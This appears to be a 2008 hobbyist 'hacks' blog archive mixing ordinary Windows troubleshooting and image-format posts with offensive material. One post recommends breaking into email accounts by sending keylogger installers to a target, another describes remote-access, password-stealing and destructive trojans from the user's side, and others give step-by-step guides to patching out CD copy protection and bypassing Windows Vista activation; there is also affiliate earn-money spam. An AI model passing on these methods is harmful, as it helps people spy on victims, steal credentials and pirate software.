Free hacks for everyone

10 reasons why the internet crashes!!

2008-10-06T23:42:00.001-07:00

Think of the time when you are working on an important document and suddenly your comp. crashes. You would be really not happy with this happening to you. So here are some reasons why the PC crashes and how to handle the crashes.

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings
Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives
After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses
Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the web-site of your antivirus software manufacturer.
7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000 , Windows Xp.

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Note: There can also be many reasons exept these so don’t rely on these totally

Increase speed of internet explorer

2008-10-06T23:23:00.000-07:00

You always must have thought to increase the speed of http requests of inernet explorer without much effort. So here is your wished fulfilled.

To comply with current Internet standards, Internet Explorer limits the number of simultaneous downloads to two downloads, plus one queued download. This configuration is a function of the browser. However, as connection speeds increase, and the number of total connections that are allowed to Internet servers increase, the two-connection limit may be restrictive.

Please Note: Changing the maximum number of connections beyond two is a violation of Internet standards; use at your own risk!

To increase the number of simultaneous connections that are allowed, follow these steps:

1. Start the Registry Editor
2. Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings
3. Select New > DWORD Value from the Edit menu
4. Name the new value MaxConnectionsPer1_0Server
5. Right-click the MaxConnectionsPer1_0Server value and choose Modify
6. Under Base, click the radio button next to Decimal
7. In the Value Data: box enter the number of simultaneous connections you want to set (for example 10 is a good value), and 8. click OK
9. Repeat steps 3 - 7 using the new value MaxConnectionsPerServer
10. Exit the registry editor

Image formats

2008-10-06T23:01:00.001-07:00

There are many graphic file formats, if we include the proprietary types. The PNG, JPEG, and GIF formats are most often used to display images on the Internet. These graphic formats are listed and briefly described below, separated into the two main families of graphics: raster and vector.

Image file formats(raster)

PNG

The PNG (Portable Network Graphics) file format is regarded and was made as the free and open successor to the GIF file format. The PNG file format supports true color (16 million colors) whereas the GIF file format only allows 256 colors. PNG excels when the image has large areas of uniform color. The lossless PNG format is best suited for editing pictures, and the lossy formats like JPG are best for final distribution of photographic-type images because of smaller file size. Many older browsers do not yet support the PNG file format. The Adam7-interlacing allows an early preview even when only a small percentage of the data of the image has been transmitted.

JPEG
The JPEG (Joint Photographic Experts Group) image files are a lossy format. The DOS filename extension is JPG, although other operating systems may use JPEG. Nearly all digital cameras have the option tosave images in JPEG format. The JPEG format supports 16-bit color and produces relatively small file sizes. Fortunately, the compression in most cases does not detract noticeably from the image. But JPEG files do suffer generational degradation when repeatedly edited and saved. Photographic images are best stored in a lossless non-JPEG format if they will be re-edited in future, or if the presence of small "artifacts" (blemishes), due to the nature of the JPEG compression algorithm, is unacceptable. JPEG is also used as the image compression algorithm in many Adobe PDF files.

TIFF

The TIFF (Tagged Image File Format) is a flexible image format that normally uses a filename extension of TIFF or TIF. TIFF's flexibility is both a feature and a curse, with no single reader capable of handling all the different varieties of TIFF files. TIFF can be lossy or lossless. Some types of TIFF offer relatively good
lossless compression for bi-level (black and white, no grey) images. Some high-end digital cameras have the option to save images in the TIFF format, using the LZW compression algorithm for lossless storage. The TIFF image format is not widely supported by web browsers, and should not be used on the World Wide Web. TIFF is still widely accepted as a photograph file standard in the printing industry. TIFF is capable of handling device-specific color spaces, such as the CMYK defined by a particular set of printing press inks.

RAW

The RAW image format is a file option available on some digital cameras. It usually uses a lossless compression and produces file sizes much smaller than the TIFF format. Unfortunately, the RAW format is not standard among all camera manufacturers and some graphic programs and image editors may not accept the RAW format. The better graphic editors can read some manufacturer's RAW formats, and some (mostly higher-end) digital cameras also support saving
images in the TIFF format directly. There are also separate tools available for converting digital camera raw image format files into other formats, one such tool being Dave Coffin's dcraw, which is made available under a combination of GNU General Public License and public domain licenses.

Adobe's Digital Negative Specification is a recent (September 2004) attempt at standardizing the various "raw" file formats used by digital cameras.

GIF

GIF (Graphic Interchange Format) is limited to an 8-bit palette, or 256 colors. This makes the GIF format suitable for storing graphics with relatively few colors such as simple diagrams, shapes and cartoon style images. The GIF format supports animation and is still widely used to provide image animation effects.

BMP

The BMP (bit mapped) format is used internally in the Microsoft Windows operating system to handle graphics images. These files are typically not compressed resulting in large files. The main advantage of BMP files is their wide acceptance and use in Windows programs. Their large size makes them unsuitable for file transfer. Desktop backgrounds and images from scanners are usually stored in BMP files.

XPM

The XPM format is the default X Window System picture format (very popular in the Linux world). Its structure is based on the string format of the C programming language. Because XPM was designed to be human-readable, and is stored as uncompressed plain-text, the file size of these pictures can be more than twice as large as uncompressed binary bitmap files (such as BMP, uncompressed TIFF, MacOS-PICT, or Irix-RGB formats). This format is unsupported by most non-Unix software and operating systems (though many web-browsers retain display support for the XBM subset, which was the minimal image format in the early days of the WWW).

MrSID

The MrSID (Multiresolution Seamless Image Database) format is a wavelet compression format used mostly by Geographic Information Systems to store massive satellite imagery for map software.

Vector formats
As opposed to the raster image formats above (where the data describes the characteristics of each individual pixel), vector image formats contain a geometric description which can be rendered smoothly at any desired display size.

SVG

SVG (Scalable Vector Graphics) is an open standard created and developed by the World Wide Web Consortium to address the need (and attempts of several corporations) for a versatile, scriptable and all-purpose vector format for the web and otherwise. The SVG format does not have a compression scheme of its own, but due to the textual nature of XML, an SVG graphic can be compressed using a program such as gzip. Because of its scripting potential, SVG is a
key component in web applications: interactive web pages that look and act like applications

GIF and JPEG are currently the primary file types for graphics on the Internet. This article provides an overview of each of them, as well as when each format should be used.

The GIF Format

The GIF format is one of the most popular formats on the Internet. Not only is the format excellent at compressing areas of images with large areas of the same color, but it is also the only option for putting animation online (unless you want to use Flash or other vector-based animation formats, which typically cost more). The GIF89a format also supports transparency, and interlacing.

GIF files support a maximum of 256 colors, which makes them practical for almost all graphics except photographs. The most common method of reducing the size of GIF files is to reduce the number of colors on the palette. It is important to note that GIF already uses the LZW compression scheme internally to make images as small as possible without losing any data

When to use them
Generally, GIF files should be used for logos, line drawings and icons. Avoid using it for photographic images, and graphics which have long stretches of continuous-tone in them. When you're designing GIF files, avoid using gradients and turn off anti- aliasing where possible to minimize the file size.

The JPEG Format

The JPEG format, with its support for 16.7 million colors, is primarily intended for photographic images. The internal compression algorithm of the JPEG format, unlike the GIF format, actually throws out information. Depending on what settings you use, the thrown out data may or may not be visible to the eye. Once you lower the quality of an image, and save it, the extra data cannot be regained so be sure to save the orginal

When to use
As a rule, the JPEG format should be used on photographic images, and images which do not look as good with only 256 colors.

12 Great Tips and tricks of Web designing

2008-03-25T01:53:00.000-07:00

Here are 12 great tips and tricks from professional web designers:

Tip and trick No.1:
Put Important Information Near the Top Organize your pages from the top down.
Important info should be easy to find.

Tip and trick No.2: Limit Length of Pages Two or three screens should be the maximum length of any page.

Tip and trick No.3: Make Navigation Simple Be consistent in your placement of navigational tool, i.e. menus, buttons, etc.Make Images As Small As Possible Reduce physical size of images in Paint program before placing in your web page.

Tip and trick No.4: Use Web Palette (216 colors) This keeps files small and makes images look good on all monitors and systems.

Tip and trick No.5: Use GIF and JPEG Properly Use JPEG for photos and GIF for everything else.

Tip and trick No.6: Avoid Busy Backgrounds Text should be easy to read.

Tip and trick No.7: Make sure you have enough contrast.

Tip and trick No.8: Use ALT Parameter (low-res and/or text) for Images This is important for people viewing your pages with older computers.

Tip and trick No.9: Avoid Excessive Animation . Don’t animate images unless you have a good reason – it can be very irritating.

Tip and trick No.10: Use Tables to Format Text and Images This is the best way to control your layout.

Tip and trick No.11: Use Common Fonts This ensures that everyone sees your page as you designed it.

Tip and trick No.12: Don’t Center Entire Pages Use this only for titles and special situations.

These are the basics tips and tricks of Web designing...

How to obtain new ip

2008-03-25T01:47:00.000-07:00

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" or "cmd"and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection",

8. Right click on "Local Area Connection" and click "properties"

9. Double-click on the "Internet Protocol (TCP/IP) " from the list under the "General" tab

10. Click on "Use the following IP address" under the "General" tab

11. Create an IP address (put any ip there like 1.2.3.4 it doesn't matter what you give there , this is only to tell you how to change your "IP" .

12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

13. Hit the "Ok" button here

14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.

16. Go back to the "TCP/IP" settings

17. This time, select "Obtain an IP address automatically"

18. Hit "Ok"

19. Hit "Ok" again

20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

Succesful method of breaking in e-mail accounts

2008-03-10T03:11:00.001-07:00

One of the most successful method is achieved with the used of keyloggers and spy software. There are lots of spyware, logging tools available today such as 007, RemoteSpy, Netvizor, Email Spy, Chat Spy, Spector Pro, eBlaster, Invisible Keylogger, to name a few. This software will create a self extracting or installation file, you can then run it in the computer for surveillance, or email it to your target. The only question is, how can you convinced the recipient to open it?

Most hackers does not really hacking passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.

Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.

Danger of ctrl+c in web

2008-03-10T03:09:00.000-07:00

Just try this:
1) Copy any text by 'ctrl+c'
2) Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp
You will see the text you copied on the Screen which was accessed by this web page. (Check it out !!)

Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.

Be cautious ...

To avoid Clipboard Hack Problem, do the following:
1. In Internet Explorer, Go to Tools -> Internet options -> Security
2. Press Custom level.
3. In the security settings, select disable under Allow paste operations via script and click on 'OK. (Now the contents of your clipboard are safe

Enable Hidden Program Uninstallation !!

2008-03-10T02:43:00.000-07:00

Enable Hidden Program Uninstallation !!
Add/Remove optional features of Windows XP

To dramatically expand the list of applications you can remove from Windows XP after installation, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open the sysoc.inf file. Under Windows XP Professional Edition RC1, this file will resemble the following by default:

[Version] Signature = "$Windows NT$"
DriverVer=06/26/2001,5.1.2505.0

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk. cpl,DisplayOcSetupProc,,7

Fax=fxsocm. dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext. dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
msnexplr=ocmsn.dll,OcEntry,msnmsn.inf,,7
smarttgs=ocgen.dll,OcEntry,msnsl.inf,,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
Games=ocgen.dll,OcEntry,games.inf,,7
AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7

[Global]
WindowTitle=%WindowTitle%

WindowTitle.StandAlone="*"

The entries that include the text hide or HIDE will not show up in Add/Remove Windows Components by default. To fix this, do a global search and replace for ,hide and change each instance of this to , (a comma). Then, save the file, relaunch Add/Remove Windows Components, and tweak the installed applications to your heart's content.

Change your cd key

2008-03-10T02:40:00.001-07:00

You don't need to re-install if you want to try the key out ... just do this:

1. Go to Activate Windows
2. Select the Telephone option
3. Click "Change Product Key"
4. Enter xxxxx-xxxxx-xxxxx-xxxxx-xxxxx ( your 25 character product key)
5. Click "Update"

Now log off and log back in again. It should now show 60 days left, minus the number of days it had already counted down.
Note: If your crack de-activated REGWIZC.DLL and LICDLL.DLL, you are going to have to re-register them.

Registry hacking

2008-03-10T02:32:00.000-07:00

Registry Hacking

Display legal notice on startup:

Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:

Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:

Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Different kinds of trojans

2008-02-18T00:14:00.000-08:00

These trojans are the most popular trojans now.
Everyone wants to have such trojan because he
or she want to have access to their victim's hard drive.
The RAT'S (remote access trojans)are very
simple to use.Just make someone run the server
and you get the victim's IP and you have FULL
access to his or her computer.They you can
almost everything it depends of the trojan you use.
But the RAT'S have the common remote access trojan functions like:
keylogger,upload and download function,
make a screen shot and so on.Some people use the
trojans for malicious purposes.
They want just to delete and delete.This is lame.
There are many programs out there
that detects the most common trojans,but new trojans are
coming every day and these programs are not the maximum defense.
The trojans do always the same things.
If the trojan restart every time Windows is loaded that
means it put something in the registry
or in win.ini or in other system file so the trojan can restart.
Also the trojans create some file in
the WINDOWS\SYSTEM directory.The file is always looking
to be something that the victim will think
is a normal WINDOWS executable.Most trojans hide
from the Alt+Ctrl+Del menu.This is not
good because there are people who use only this way to see
which process are running.There are programs
that will tell me you exactly the process and the
file from where it comes.Yeah but some trojans
as I told you use fake names and it's a little hard
for some people to understand which process
should they kill.The remote access trojans opens
a port on your computer letting everyone to connect.
Some trojans has options like change the port
and put a password so only the guy that infect you
will be able to use the computer.The change
port option is very good because I'm sure you
don't want your victim to see that port 31337 is open
on their computer.Remote access trojans are
appearing every day and they will continue to appear.
For those that use such trojans: BE CAREFUL
you can infect yourself and they the victim you
wanted to destroy will revenge and you'll be sorry.
---------------------------------------
Password Sending Trojans

The purpose of these trojans is to rip all cached
passwords and send them to specified e-mail
without letting the victim about the e-mail.
Most of these trojans don't restart every time Windows
is loaded and most of them use port 25 to
send the e-mail.There are such trojans that e-mail
other information too like ICQ number
computer info and so on.These trojans are dangerous if
you have any passwords cached anywhere on your computer.
----------------------------------------
Keyloggers

These trojans are very simple.The only one thing
they do is to log the keys that the victim is pressing
and then check for passwords in the log file.
In the most cases these trojans restart every
time Windows is loaded.They have options
like online and offline recording.In the online recording
they know that the victim is online and
they record everything.But in the offline recording
everything written after Windows start is
recorded and saved on the victims disk waiting for
to be transferred.
----------------------------------------
Destructive

The only one function of these trojans is to
destroy and delete files.This makes them very simple
and easy to use.They can automatically
delete all your .dll or .ini or .exe files on your computer.
These are very dangerous trojans and once
you're infected be sure if you don't disinfect your
computer information will no longer exist.
-----------------------------------------
FTP
trojans
These trojans open port 21 on your computer
letting EVERYONE that has a FTP client to connect
to your computer without password and will full upload and download options.

These are the most common trojans.They all are dangerous
and you should me careful using them.

Earn money by sms

2008-02-18T00:12:00.000-08:00

Hi,
How do you like the idea of getting paid to receive SMS? m-earn promises you just that !
These messages would only contain offer and discounts based on your own interests. You also get to decide the number of ads you receive and their delivery times!
Check out. Here
There is no limit to what you can earn by referring your friends and relatives..

India's no.1 paying site

2008-02-18T00:08:00.000-08:00

Moneycosmos.com - Affiliate Program India !
Lots of People among them just want to sit beside the Pc and earn money .. In USA , Canada , Uk , and like all the Other Countries .. So here comes an oppurtunity for us to earn like they earn just sitting at home and Money Cosmos Helps us in Doing that , its simple just like 1 . 2 . 3 .

How will you earn Money?
In simple words, this is your once in a lifetime opportunity to earn money online. They will pay you up to $1.00 USD, Rs. 45.00 INR for each user who registers for FREE with our Advertiser. Plus, they also pay you a whopping 20% extra for transactions generated by members refered by you!

Why Money Cosmos?
Money Cosmos is a venture of Karmath Infotech Private Limited ®
There are several plus points about Money Cosmos, which differ us from other affiliate websites.

• Registration is 100% Free! No Hidden Cost
• You don't need to earn Rs.2,000 or 5,000 to get paid Our Minimum Payout is Just Rs.500
• You don't need to wait for 90 or even 60 days for payments. We pay monthly.
• We don't just say that we pay, we are the only website that proved that we really pay.

What are you waiting for? Click here to Join Money Cosmos

India's

Hide your files in a .jpeg file

2008-01-31T03:52:00.000-08:00

For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Customize the command prompt

2008-01-31T03:43:00.000-08:00

1◘ Click on the Start Button and key in Command Prompt and hit Enter.

2◘ Once Command Prompt has started, right click on the top left icon in the menu bar and select Defaults. Alternatively you can select Properties if you want to have different settings for different Command Prompt shortcuts.

3◘ You will now see the four tabs of options to customize. The sections that I always work with are Font, Layout and Colors. To get started, click on the Font tab. Here you will be able to change the font and size used. If you would like a micro prompt as shown below, select Raster Fonts and size 4x6.

4◘ On the Layout tab you can specify the size and location of the window as well as the buffer. I usually only change the Screen Buffer Height setting. This controls how many previous command lines are saved and can be scrolled back up through.

5◘ Increasing this value is useful if you are looking at a large directory with more than 300 files. I always increase the Height value to the max which is 9999.

6◘ The Color tab is where you get to have the most fun changing the look of your Command Prompt. Just select what you want to change the color for and then change the color.

7◘ Back on the Options tab I recommend turning on Quick Edit Mode. This allows you to easily highlight text without having to go to Edit -> Mark and copy it by just right clicking. Then you can paste it by simply right clicking once more.

8◘ When you are finished customizing your Command Prompt, just hit OK to save your changes.

Tips for command prompt

2008-01-31T03:38:00.000-08:00

Turn on Quick Edit Mode. This will allow you to easily select, copy and paste all with just your mouse and a right click.

When typing in a file or folder name, type in part of the name and then hit the . TAB key to bring up matches. Use SHIFT +TAB to go the other direction

When searching for a file, type in dir part_of_filename* to look for the file in the folder. To search sub directories as well, append the /s flag as well. Example: dir exp* /s

Use the up arrow to go back over past commands. Alternatively you can hit F7 and go directly to the command.

When working with network drives type: prompt $m$p$g to show the full network path along with the drive prompt. Other prompt settings can be found by running prompt /?.

You can print the contents of a file by typing: copy file.txt prn
Write the output of any command by appending > output.txt. For example, dir > filelist.txt

How to crack ANY TYPE OF CD PROTECTION

2008-01-30T07:20:00.000-08:00

Now I’m gonna show you, how to crack any type of CD Protection, using W32Dasm (you can download it from http://prt.kgb.pl/index.php?path=misc%2Fprogramowanie),
and HIEW (http://www.hiew.ru/) .

OK, let’s start:
First of all, you have to run the game you want to crack, without the CD. The game, doesn’t work of course, BUT a window pops up, telling you an error message. This error message will help you to crack the game so, you’ve got to remember it.
For example:
Please insert the - CD, or: You need the CD to play the - . ( -, is thegame you want to crack). Anyway, if you can’t remember it,write it, in a little piece of paper. Now, run Win32Dasm , and on the toolbar, press the first little button on the left, OR, go to Disassembler
->Open file to Disassemble.
A menu will pop up. Select the exe which you want to crack. The disassemble, will take few minutes so,
OK, it finished its process. Now, in your screen, there is a strange text, and we can’t understand anything of course. Don’t worry, the only thing we have to do, ( If you want, you can change the font), is to click on the String Data References , the button next to the print button (Strn.REF). You can see a window which is called String Data Items . Scroll down, and try tofind the game’s error message. When you’ll find it , double click on it , and then,close the window, to go back to the Win32Dasm text. As you can see you are somewhere in the CD check routine. This is the message’s place.
Now comes the interesting and difficult part, so, be careful. We don’t know what all this mean, BUT we must know the @ offset ofevery call and jump command. Write down , every call and jump @ offset number. (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the h.
Let’s go to Hiew.
HIEW:
To move up and down, use the cursor keys.
Start HIEW. exe. In the HIEW directory, there is a list of exes and programs. Go to the directory, which you saved the game’s exe, we want to crack, and click on the exe. Click F4,and then, a menu will pop up, with 3 words. Text, Hex, and Decode. Click on Decode, and now, we can understand the list of numbers.Click F5, and you can now enter the number, we wrote down, in Win32Dasm. Type it, and you will be placed at the number’s place. The cursor is placed on a command.
Before I’ll continue, I want to explain you something. For example, if the command where our cursor is placed, is E92BF9BF74, means that it is 5 bytes.Every 2 numbers, are one byte: E9-2B-F9-BF-74 = 90-90-90-90-90. 10 letters, mean, 5 bytes. The number 90, is the “Noop number”.OK, i hope you understood it ,
Press F3, which means edit, and now you can edit these ten numbers.Type five times, the number 90. For every byte, 90. Now click on F10 to exit.We cracked the CD protection of the - . Congratulations!!!!

Permanently activate windows vista

2008-01-30T07:17:00.000-08:00

Install Windows Vista Ultimate edition (or other edition) without product key.
Windows Vista needs to be applied with 2099-ReArm trick, so that the counter of minutes to no activation required period will not return to normal after reboot. Click on Start Orb button.
Select “All Programs”, then “Accessories”.
Right click on “Command Prompt, then select “Run as Administrator (A)”.
If User Account Control (UAC) prompt a warning message, click on “Continue”.
In the command prompt, type date and press Enter. You will see the following:

Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>date
Current date: 12/19/2006 Thursday
Enter new date:
Enter 12/31/2099 (December 31, 2099).
Next, type cscript slmgr.vbs -rearm. You will see something like the following:

C:\Windows\system32>cscript slmgr.vbs -rearm
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

The command completed successfully.
To make the change effectively, please restart the system.
Then reset the date of the system to current date again by typing date again. You will see the following:

Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

